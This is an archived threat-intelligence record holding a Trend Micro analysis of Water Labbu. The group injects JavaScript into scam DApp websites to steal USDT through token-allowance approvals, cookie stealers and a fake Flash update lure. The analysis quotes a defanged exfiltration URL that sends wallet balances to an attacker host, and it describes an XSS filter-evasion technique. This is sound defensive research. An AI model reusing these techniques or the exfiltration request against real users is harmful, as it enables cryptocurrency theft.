{
	"id": "761ef62f-589b-4cd6-ad1f-16d42a72e4d6",
	"created_at": "2026-04-06T00:13:22.518095Z",
	"updated_at": "2026-04-10T13:11:23.908176Z",
	"deleted_at": null,
	"sha1_hash": "d86c57124b79e83d324b68b7f4e229632484a5a5",
	"title": "Water Labbu Abuses Malicious DApps to Steal Cryptocurrency",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1777121,
	"plain_text": "Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\r\nBy By: Joseph C Chen, Jaromir Horejsi Oct 03, 2022 Read time: 6 min (1666 words)\r\nPublished: 2022-10-03 · Archived: 2026-04-05 15:10:59 UTC\r\nCyber Crime\r\nThe parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious\r\nJavaScript code into their malicious decentralized application websites to steal cryptocurrency.\r\nWe discovered a threat actor we named Water Labbu that was targeting cryptocurrency scam websites. Typically,\r\ncryptocurrency scammers use social engineering techniques,  interacting with victims to gain their trust and then\r\nmanipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu\r\nmanaged to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances\r\nfrom their victim’s wallets, unlike other similar campaigns, they did not use any kind of social engineering — at\r\nleast not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam\r\nunsuspecting victims.\r\nIn a parasitic manner, the threat actor compromised the websites of other scammers posing as a decentralized\r\napplication (DApp) and injected malicious JavaScript code into them. The techniques used by the original\r\nscammers are detailed in an alert released from law enforcement agencies.\r\nWhen the threat actor finds a victim who has a large amount of cryptocurrency stored in a wallet that is connected\r\nto one of the scam websites, the injected JavaScript payload will send a request for permissions. The request is\r\ndisguised to look like it was being sent from a compromised website and asks for permission (token allowance) to\r\ntransfer a nearly-unlimited amount of USD Tether (USDT, which is a stablecoin pegged to the US dollar with a\r\nvalue of 1:1) from the target’s wallet.\r\nWater Labbu’s targets are led to believe that the request was originally issued by a DApp, which may cause them\r\nto disregard thoroughly reviewing the permission’s details. However, the granted permission does not belong to\r\nthe crypto addresses of the original scammer, but to another address controlled by Water Labbu. The threat actor\r\ncan then use the obtained permission to drain all USDT funds from the victim’s wallet.\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 1 of 8\n\nFigure 1. The Water Labbu attack flow\r\nAs of the time of writing, we found 45 fraudulent cryptocurrency-related DApp websites that have been\r\ncompromised by Water Labbu. These websites show similar styles and themes to the websites used in the\r\n“Lossless Mining Liquidity Pledge Free” scams.\r\nUpon checking the transaction records of the threat actor’s addresses on the Ethereum blockchain, we discovered\r\nthat they have successfully stolen funds from at least nine different victims for a total amount of at least 316,728\r\nUSDT.\r\nIn the following sections, we are going to share how the actor used injected JavaScript code to hijack\r\ncryptocurrency from fraudulent DApp websites, as well as additional findings that hints at how they may have\r\ncompromised scammers.\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 2 of 8\n\nFigure 2. Screenshot of a compromised fraudulent DApp website\r\nAnalyzing the cryptocurrency theft routine\r\nAs we mentioned in the introduction, Water Labbu’s modus involves compromising scam DApp websites and\r\ninjecting their JavaScript payload into them. The DApp websites seem to be designed via some form of custom\r\ntemplate, where the displayed messages in an announcement box are received in JSON format by sending an\r\nHTTP request to a given URL. The content of the request (Figure 3) shows a JSON object with a “helper” key\r\ncontaining a few embedded items. The first item is clearly injected and contains an evaluation of the Base64-\r\nencoded script.\r\nFigure 3. Visual example of an announcement box from a scam DApp website\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 3 of 8\n\nFigure 4. Displayed data received in JSON format\r\nIn one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64- encoded JavaScript payload\r\nusing  the “onerror” event, in what is known as an XSS evasion technique, to bypass Cross Site Scripting (XSS)\r\nfilters. The injected payload then creates another script element that loads another script from the delivery server\r\ntmpmeta[.]com. The delivery server then filters victims and delivers different content based on the IP address and\r\nthe browser User-Agent header (which is used to help  determine the victims’ environment).\r\nWe noticed the following behavior:\r\nIf the victim loads the script from a mobile device using Android or iOS, it returns the first stage script\r\nwith cryptocurrency-theft capabilities.\r\nIf the victim loads the script from a desktop running Windows, it returns another script showing a fake\r\nFlash update message asking the victim to download a malicious executable file.\r\nIt’s worth mentioning that the delivery server implements a mechanism to avoid loading a script multiple times\r\nfrom the same IP address over a short period of time. If an IP address accessed the delivery server in the last few\r\nhours or the type of device the victim uses does not match other required conditions, it will return a simple stealer\r\nscript that will collect cookie and LocalStorage data and send them back to the delivery server.\r\nFigure 5. Stealer script that collects cookie and LocalStorage data\r\nThe cryptocurrency-stealing script: first stage\r\nInitially, the web3.js library is loaded. This provides the first stage script the ability to connect to the victim’s\r\nwallet, although the malicious script will communicate with the victim’s wallet only if a victim has their wallet\r\nconnected to the compromised DApp website. Gaining access to the wallet allows Water Labbu to gather the\r\ntarget’s Ethereum address and balance. The script also interacts with Tether USD smart contract  to receive the\r\nvictim’s USDT balance. If the wallet contains more than 0.001 ETH or more than 1 USDT, it will send the wallet\r\nbalance information and the wallet address to the information collecting server, linkstometa[.]com, via an HTTP\r\nrequest.\r\nThe following text shows the request to exfiltrate the wallet balance:\r\nhxxps[:]//linkstometa[.]com/data/?get\u0026s=[%22{ETH balance}%22,%22{USDT balance}%22]\u0026j={Ethereum\r\naddress}\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 4 of 8\n\nFigure 6. Script for collecting wallet balance and the default wallet address (deobfuscated)\r\nThe cryptocurrency-stealing script: second stage\r\nThe exfiltration request will return the second stage script once the reported balance has both an ETH balance\r\nhigher than 0.005 ETH and a USDT token balance higher than 22,000 USDT. Otherwise, it will return an empty\r\npayload and leave the victims for other scammers. During the second stage script, the third balance check is\r\nperformed and the token allowance approval is requested. \r\nFigure 7. The script responsible for showing token allowance approval\r\nThe token approval request asks victims to grant to permission to a given address to complete transactions and\r\nspend cryptocurrency assets. The malicious script requests an approval limit of 10^32 USDT, which is far more\r\nthan the total available USDT tokens on the blockchain. When the “approve” request is issued, the cryptocurrency\r\nwallet applications will ask users to review the details of the request before confirmation. If the victim does not\r\ncarefully check the request details and grants the permissions to the Water Labbu’s address, the threat actor will be\r\nable to transfer all the USDT from the victim’s wallet.\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 5 of 8\n\nFigure 8. The review prompt for the malicious permission requests by the cryptocurrency wallet\r\nAnalysis of the blockchain transactions\r\nDuring our monitoring of Water Labbu’s operations, we noticed two addresses being repeatedly used to receive\r\nthe granted permissions and to transfer the victims’ cryptocurrency assets.\r\nThe address, 0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a, is the first to receive the token approvals from\r\nvictims. As of August 2022, the address has successfully used the “Transfer From” method seven times to collect\r\nUSDT from different addresses, likely belonging to the group’s victims. Funds were then transferred to the second\r\naddress, 0x3e9f1d6e244d773360dce4ca88ab3c054f502d51. The second address has two transactions transferring\r\nstolen USDT to two other addresses:  0x486d08f635b90196e5793725176d9f7ead155fed and\r\n0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf.\r\nThe address, 0xfece995f99549011a88bbb8980bbedd8fada5a35, is a newer one we found inside Water Labbu’s\r\nscripts from June 2022. This address successfully drained USDT from two addresses, swapping them on the\r\nUniswap cryptocurrency exchange — first to USD Coin (USDC), then to ETH — before finally sending the ETH\r\nfunds to the Tornado Cash mixer.\r\nAs of August 2022, the total amount of USDT drained by Water Labbu from nine victims amounts to 316,728\r\nUSDT.\r\nFigure 9. Diagram showing the transactions of stolen USDT\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 6 of 8\n\nAnalysis of the fake Flash infection chain\r\nWhen a target visits the compromised DApp websites using a Windows desktop, the delivery server,\r\ntmpmeta[.]com, will return a different script that will try to steal cookie and LocalStorage data. It also loads\r\nadditional scripts from other delivery servers such as whg7[.]cc and r8s[.]cc. The delivery server, r8s[.]cc,\r\nreturned the latest stage script, creating a fake Flash installation message overlay on the compromised websites.\r\nThe message, which is in simplified Chinese, states that Flash Player support ended on September 14, 2020, and\r\nthat downloading the latest version is needed to continue viewing the page.\r\nFigure 10. The script loading sequence on a Windows desktop system\r\nFigure 11. The fake Flash Player installation message being overlayed on the compromised website\r\nThe download link in the overlay will not point to the legitimate installer. Unsurprisingly, it redirects victims to a\r\ndownload of another file, flashupdate_v_3.10.exe, that is hosted in the GitHub repository “flashtech9/Flash.” The\r\ndownloaded file is an installer of a software called Third Eye, an employee monitoring software developed by the\r\nChinese company Yangzhou Third Eye Software Technology. \r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 7 of 8\n\nFigure 12. The list of files available for download from the GitHub repository “flashtech9/Flash”\r\nConclusion\r\nWater Labbu has managed to steal cryptocurrency funds by injecting their malicious scripts to fraudulent websites\r\nof other scammers, showing a willingness to exploit the methods of other malicious actors for their own ends.\r\nFortunately, traditional best practices for security are still applicable in this situation and can help users avoid the\r\ngroup’s schemes.\r\nUsers should be careful of any invitations for investment that originate from untrusted parties. Furthermore, they\r\nshould not trade cryptocurrency funds on any unknown platform without thoroughly vetting its legitimacy,\r\nunderstanding what it does, and how it operates. We suggest that users review the parameters of the transactions\r\n(token approval limits) and ensure that it has not been modified or issued by an untrusted party.\r\nIn the next blog entry, we are going to share our additional findings related to Water Labbu’s infection chains,\r\nwhich includes their successful exploitation techniques and the patching of an ElectronJS-based application used\r\nby scammer\r\nIndicators of Compromise\r\nThe indicators of compromise for this blog entry can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nhttps://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\r\nPage 8 of 8\n\nrequest. The following text shows the request to exfiltrate the wallet balance: \nhxxps[:]//linkstometa[.]com/data/?get\u0026s=[%22{ETH balance}%22,%22{USDT balance}%22]\u0026j={Ethereum\naddress}  \n Page 4 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html"
	],
	"report_names": [
		"water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html"
	],
	"threat_actors": [
		{
			"id": "2128689c-108c-4d66-b551-de8e4fcf8653",
			"created_at": "2023-11-14T02:00:07.084086Z",
			"updated_at": "2026-04-10T02:00:03.445971Z",
			"deleted_at": null,
			"main_name": "Water Labbu",
			"aliases": [],
			"source_name": "MISPGALAXY:Water Labbu",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434402,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d86c57124b79e83d324b68b7f4e229632484a5a5.pdf",
		"text": "https://archive.orkl.eu/d86c57124b79e83d324b68b7f4e229632484a5a5.txt",
		"img": "https://archive.orkl.eu/d86c57124b79e83d324b68b7f4e229632484a5a5.jpg"
	}
}